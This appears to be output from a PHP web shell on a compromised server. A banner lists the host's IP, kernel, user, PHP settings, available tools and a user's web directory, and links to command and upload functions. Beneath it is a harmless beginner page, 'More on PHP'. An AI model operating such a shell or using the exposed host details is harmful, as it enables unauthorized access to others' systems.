Server IP : 172.16.15.8 / Your IP : 3.133.123.162 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/slcebula/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<HTML> <HEAD> <TITLE> More on PHP </TITLE> </HEAD> <BODY BGCOLOR="BLUE"> <?php print "<H1>\n More on PHP\n\n <P></H1>"; print "If you have ever used programming languages such as <I> Perl, C, or C++ </I> ,many of the features of PHP will be familiar.\n"; print "\n\n"; print "\nIn particular, you might notice some similarity to Perl with features such as \n<UL>\n <LI>Regular expressions\n <LI>Associative arrays\n <LI>File I/O\n </UL>\n"; ?> </BODY> </HTML>